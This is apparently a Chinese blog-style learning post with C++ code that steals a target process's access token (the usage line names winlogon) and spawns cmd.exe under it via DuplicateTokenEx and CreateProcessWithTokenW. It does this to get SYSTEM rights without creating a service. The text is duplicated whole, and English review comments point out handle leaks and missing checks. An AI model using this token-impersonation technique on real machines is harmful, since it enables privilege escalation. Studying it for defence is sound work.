有点想知道怎么不通过创建服务的方式来用SYSTEM权限运行指定的进程,我很好奇。网上搜了搜,分析了一下别人写的,学习了一哈
1.获取指定进程的令牌句柄
2.通过令牌句柄创建主令牌
3.通过创建的令牌执行新的Process
head.h
<span>#<span>pragma</span> once</span><br><span>#<span>include</span> <span>"iostream"</span></span><br><span>#<span>include</span> <span>"string"</span></span><br><span>#<span>include</span> <span>"Windows.h"</span></span><br><span>using</span> <span>namespace</span>::<span>std</span>;<br>
main.cpp
#include "stdafx.h"
#include "head.h"

// Demo of launching a process under another process's security token.
// Flow: open the target process -> open its token -> duplicate it as a
// primary token -> CreateProcessWithTokenW(cmd.exe). Each step prints the
// GetLastError() code on failure; GetAccessToken returns NULL, Runprocess
// falls through.
// NOTE(review): none of the handles obtained here (process handle, the
// original token, the duplicated token, pi.hProcess / pi.hThread) are ever
// closed.
// NOTE(review): Win32 documents CreateProcessWithTokenW as requiring
// SeImpersonatePrivilege, so this only works from an already-privileged
// context; it does not bypass the access checks on the target process or
// its token — confirm against the target OS.
class Jack
{
public:
	// Opens process `pid` and returns a handle to its access token, or NULL
	// (after printing the error code) when OpenProcess or OpenProcessToken
	// fails.
	HANDLE GetAccessToken(DWORD pid) {
		HANDLE currentProcess = {};
		HANDLE Asstoken = {};
		DWORD LastError;
		// bInheritHandle is TRUE, making the process handle inheritable by
		// children; nothing in this file relies on that.
		currentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);
		if (!currentProcess) {
			LastError = GetLastError();
			cout << "ERROR:OpenProcess(): " << LastError << endl;
			return (HANDLE)NULL;
		}
		// Requests the token rights the later DuplicateTokenEx /
		// CreateProcessWithTokenW calls operate with.
		if (!OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, &Asstoken)) {
			LastError = GetLastError();
			cout << "ERROR:OpenProcessToken(): " << LastError << endl;
			return (HANDLE)NULL;
		}
		// NOTE(review): currentProcess is leaked on both this success path
		// and the OpenProcessToken failure path above.
		return Asstoken;
	}
	// Duplicates `Token` into a primary token and spawns cmd.exe under it.
	// Errors are printed, not propagated: the function returns void and has
	// no other way to report failure to the caller.
	void Runprocess(HANDLE Token) {
		DWORD LastError;
		// The duplicate is written back into `Token`, overwriting this
		// function's copy of the handle passed in; neither handle is closed.
		if (!DuplicateTokenEx(Token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &Token)) {
			LastError = GetLastError();
			// NOTE(review): the message is missing ":D" (intended
			// "ERROR:DuplicateTokenEx()"); it is runtime output, so left as-is.
			cout << "ERRORuplicateTokenEx(): " << LastError << endl;
			// NOTE(review): execution continues with the non-duplicated
			// handle; a failure here should return instead.
		}
		STARTUPINFOW si = {};
		PROCESS_INFORMATION pi = {};
		BOOL ret;
		ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, L"C:\\Windows\\System32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
		if (!ret) {
			LastError = GetLastError();
			cout << "ERROR:CreateProcessWithTokenW(): " << LastError << endl;
		}
		// NOTE(review): pi.hProcess and pi.hThread are never closed on
		// success.
	}
};
// Original note (translated): wmain() vs. main() vs. other main variants.
// The original remark about the second argument and hex conversion is
// unclear; see the _wtoi comment below for what the code actually does.
int wmain(int argc,WCHAR **argv) { // wmain() is the UNICODE main(); _tmain() is a macro that expands to wmain() when UNICODE is defined
	if (argc < 2)
	{
		cout << "Usage winlogon <Pid>" << endl;
		return 1;
	}
	DWORD pid;
	pid = _wtoi(argv[1]); // _wtoi parses a decimal string; the original comment said "hex to int", which is not what _wtoi does
	cout << "[+] PID: " << pid << endl;
	Jack jk;
	HANDLE Ptoken=jk.GetAccessToken(pid);
	// NOTE(review): Ptoken is passed on without a NULL check, so a failed
	// GetAccessToken still reaches DuplicateTokenEx / CreateProcessWithTokenW.
	jk.Runprocess(Ptoken);
	return 0;
}
以Administrator权限运行cmd
1.获取指定进程的令牌句柄
2.通过令牌句柄创建主令牌
3.通过创建的令牌执行新的Process
head.h
<span>#<span>pragma</span> once</span><br><span>#<span>include</span> <span>"iostream"</span></span><br><span>#<span>include</span> <span>"string"</span></span><br><span>#<span>include</span> <span>"Windows.h"</span></span><br><span>using</span> <span>namespace</span>::<span>std</span>;<br>
main.cpp
#include "stdafx.h"
#include "head.h"

// Demo of launching a process under another process's security token.
// Flow: open the target process -> open its token -> duplicate it as a
// primary token -> CreateProcessWithTokenW(cmd.exe). Each step prints the
// GetLastError() code on failure; GetAccessToken returns NULL, Runprocess
// falls through.
// NOTE(review): none of the handles obtained here (process handle, the
// original token, the duplicated token, pi.hProcess / pi.hThread) are ever
// closed.
// NOTE(review): Win32 documents CreateProcessWithTokenW as requiring
// SeImpersonatePrivilege, so this only works from an already-privileged
// context; it does not bypass the access checks on the target process or
// its token — confirm against the target OS.
class Jack
{
public:
	// Opens process `pid` and returns a handle to its access token, or NULL
	// (after printing the error code) when OpenProcess or OpenProcessToken
	// fails.
	HANDLE GetAccessToken(DWORD pid) {
		HANDLE currentProcess = {};
		HANDLE Asstoken = {};
		DWORD LastError;
		// bInheritHandle is TRUE, making the process handle inheritable by
		// children; nothing in this file relies on that.
		currentProcess = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, pid);
		if (!currentProcess) {
			LastError = GetLastError();
			cout << "ERROR:OpenProcess(): " << LastError << endl;
			return (HANDLE)NULL;
		}
		// Requests the token rights the later DuplicateTokenEx /
		// CreateProcessWithTokenW calls operate with.
		if (!OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, &Asstoken)) {
			LastError = GetLastError();
			cout << "ERROR:OpenProcessToken(): " << LastError << endl;
			return (HANDLE)NULL;
		}
		// NOTE(review): currentProcess is leaked on both this success path
		// and the OpenProcessToken failure path above.
		return Asstoken;
	}
	// Duplicates `Token` into a primary token and spawns cmd.exe under it.
	// Errors are printed, not propagated: the function returns void and has
	// no other way to report failure to the caller.
	void Runprocess(HANDLE Token) {
		DWORD LastError;
		// The duplicate is written back into `Token`, overwriting this
		// function's copy of the handle passed in; neither handle is closed.
		if (!DuplicateTokenEx(Token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &Token)) {
			LastError = GetLastError();
			// NOTE(review): the message is missing ":D" (intended
			// "ERROR:DuplicateTokenEx()"); it is runtime output, so left as-is.
			cout << "ERRORuplicateTokenEx(): " << LastError << endl;
			// NOTE(review): execution continues with the non-duplicated
			// handle; a failure here should return instead.
		}
		STARTUPINFOW si = {};
		PROCESS_INFORMATION pi = {};
		BOOL ret;
		ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, L"C:\\Windows\\System32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
		if (!ret) {
			LastError = GetLastError();
			cout << "ERROR:CreateProcessWithTokenW(): " << LastError << endl;
		}
		// NOTE(review): pi.hProcess and pi.hThread are never closed on
		// success.
	}
};
// Original note (translated): wmain() vs. main() vs. other main variants.
// The original remark about the second argument and hex conversion is
// unclear; see the _wtoi comment below for what the code actually does.
int wmain(int argc,WCHAR **argv) { // wmain() is the UNICODE main(); _tmain() is a macro that expands to wmain() when UNICODE is defined
	if (argc < 2)
	{
		cout << "Usage winlogon <Pid>" << endl;
		return 1;
	}
	DWORD pid;
	pid = _wtoi(argv[1]); // _wtoi parses a decimal string; the original comment said "hex to int", which is not what _wtoi does
	cout << "[+] PID: " << pid << endl;
	Jack jk;
	HANDLE Ptoken=jk.GetAccessToken(pid);
	// NOTE(review): Ptoken is passed on without a NULL check, so a failed
	// GetAccessToken still reaches DuplicateTokenEx / CreateProcessWithTokenW.
	jk.Runprocess(Ptoken);
	return 0;
}
以Administrator权限运行cmd